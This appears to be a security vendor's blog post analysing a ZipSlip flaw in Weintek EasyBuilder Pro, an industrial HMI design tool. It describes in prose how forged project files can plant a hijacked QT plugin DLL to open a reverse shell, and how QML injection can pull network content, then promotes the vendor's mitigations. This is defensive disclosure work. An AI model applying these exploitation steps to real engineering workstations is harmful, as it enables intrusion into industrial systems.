In this blog post, we will delve into the underlying causes of the vulnerabilities discovered in Weintek’s applications by our researchers from TXOne PSIRT and Threat Research Team. We will also provide a mitigation strategy to address the issue. For further information, please refer to the CISA Advisory publication: https://www.cisa.gov/uscert/ics/advisories/icsa-23-045-01
Weintek Ecosystem Overview
To gain a comprehensive understanding of the potential impact of the vulnerability, we conducted an analysis of the ecosystem surrounding Weintek’s product. The results of this analysis are presented below.
Figure 1. Weintek Ecosystem Overview
Vulnerability Root Cause Analysis
The exploitation scenario discussed in this blog is based on EasyBuilder Pro V6.07.02.273 Build 2022.07.26. In this version, we discovered the ZipSlip vulnerability that enables an attacker to drop malicious files to an arbitrary location by using a forged project file.
Figure 2. Overview of EasyBuilder Pro
1. Project Decompiling
The project file extension used in EasyBuilder Pro is “.cxob” which is actually “.tar.gz”. During the decompiling process, once the project file is loaded into EasyBuilder Pro, it will decompress the “.cxob” file and convert it to the “.cmtp” format. Then, EasyBuilder Pro will open the decompressed project file in the “.cmtp” format.
Figure 3. Decompiling the Project File
Figure 4. Opening the Decompiled Project File
Figure 5. HMI GUI in the Project File
2. ZipSlip Vulnerability in bsdtar.exe
In EasyBuilder Pro, the bsdtar.exe is utilized to decompile the project file. However, it is imperative to note that outdated versions of this file are highly insecure.
Figure 6. The bsdtar.exe Version 2.4.12.3100 is Vulnerable
The outdated version of bsdtar.exe is affected by the ZipSlip vulnerability, which allows it to parse absolute or relative paths during the decompression process. As a result, an attacker can drop a malicious file to any desired location, rather than being restricted to the current directory.
Figure 7. The Attacker can Assign the Absolute Path in the Project file
In most cases, the source of the project file may be from the Network, USB, or HMI (as depicted in Figure 8). If you are not fully confident in the trustworthiness of the source, it is highly recommended that you exercise caution and avoid decompiling project files using unpatched EasyBuilder Pro or any SCADA software.
Figure 8. The Project File Might be Sent From a Network, USB, or HMI
Exploitation
In an effort to raise awareness of the dangers posed by untrusted project files, we demonstrated the exploitation PoC of this vulnerability. Our prime motive is to write a file to an arbitrary path with fully controllable data. The challenge is to convert this vulnerability into a remote code execution (RCE) exploit.
The target that immediately comes to mind is QT, given that EasyBuilder Pro is heavily reliant on QT. During the decompression and rendering of the project file (.cxob), a multitude of QT components will be dynamically loaded based on the HMI GUI design specified in the project file.
Figure 9. EasyBuilder Pro Import QML Files During Rendering of the Project
Figure 10. EasyBuilder Pro import QT Plugin DLL While Rendering the Project
Our objective is to obtain a reverse shell without disrupting the daily operations of the EWS. This requires ensuring that all systems and processes continue to function normally.
1. QT Plugin DLL Hijacking
QT has been designed to load external modules as plugins. Based on the information presented in ZDI’s blog, we understand that hijacking a QT plugin can be accomplished through the following two steps:
1) The QT plugin must contain the segment “.qmetad” in the proper format.
2) The QT plugin must correctly provide an exported function known as “qt_plugin_instance” in most cases.
Figure 11. The Malicious windowplugin.dll
After conducting some experimentation, we were able to successfully create a malicious DLL and incorporate it into the project file. When EasyBuilder Pro loads this malicious project file, the attacker (in this case, us) will obtain initial access to the system.
1. The popup message box means that DllMain in the malicious DLL was loaded by EasyBuilder Pro.
Figure 12. The Hijacked DLL is Summoned Successfully
2. And then, the malicious DLL will create a new thread for the reverse shell.
Figure 13. The Reverse Shell in the Hijacked DLL is Triggered
3. By comparing the ethernet adapter setting and username, we can see that the reverse shell is spawned from the victim’s machine.
Figure 14. Verifying the Reverse Shell is From the Same Machine
2. QML Injection
Furthermore, we identified another possible method of attack in the form of QML injection.
The most interesting aspect of QML is that it gives developers the ability to write and execute JavaScript code, or to include resources (as demonstrated in Figures 15 and 16) from a network. The “image” tag, for instance, allows for an image source to be loaded from a network.
While we have only prepared a simple proof of concept for this attack vector, full remote code execution remains a viable possibility. It is important to be cognizant of the potential danger posed by this handy attack vector.
Figure 15. The Malicious QML can Import Images through HTTP
Figure 16. HTTP Request From the Victim’s Machine
Prevent Exploitation with TXOne Goalkeeper
1. Use StellarProtect’s Application Lockdown to prevent the malicious process from spawning from the compromised process by DLL side-loading.
Figure 17. Illustrates the Successful Blocking of the Malicious Process by StellarProtect’s Application Lockdown, as Reflected in the System Event Log
Figure 18. In console, it shows that StellarProtect’s Application Lockdown Blocks the Malicious Process Successfully
2. Use StellarProtect’s OT Safeguard to prevent the overwriting of files in the ICS software installation folder.
Figure 19. In the System Event Log, StellarProtect’s OT Safeguard Block Successfully Prevented the Overwriting of the File
Figure 20. In console, StellarProtect’s OT Safeguard Block Successfully Prevented the Overwriting of the File
Timelines
References
[1] ZDI, LOADING UP A PAIR OF QT BUGS: DETAILING CVE-2019-1636 AND CVE-2019-6739, ZDI, Accessed Feb 6 2023
[2] Weincloud, OPC UA Server, Weintek, Accessed Feb 6 2023
